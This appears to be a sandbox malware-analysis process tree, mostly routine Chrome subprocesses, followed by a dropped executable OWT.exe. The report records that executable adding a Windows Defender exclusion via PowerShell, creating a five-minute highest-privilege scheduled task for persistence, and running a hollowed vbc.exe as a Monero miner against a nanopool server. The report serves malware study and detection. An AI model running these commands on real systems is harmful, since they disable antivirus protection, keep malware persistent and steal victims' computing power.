C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5992 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6888 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6432 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6484 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3744 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6652 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1432 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6628 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4848 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6576 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6868 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2856 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6152 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3156 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6400 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2580 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6536 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3164 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffedac74f50,0x7ffedac74f60,0x7ffedac74f702⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,8313304110618611353,3050686260969456256,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1692 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,8313304110618611353,3050686260969456256,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2004 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"2⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffedac74f50,0x7ffedac74f60,0x7ffedac74f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --exception-pointers=71038760157184 --process=172 /prefetch:7 --thread=50963⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4556 -s 14403⤵
- Program crash
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2032 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4548 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4564 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8052 /prefetch:12⤵
-
-
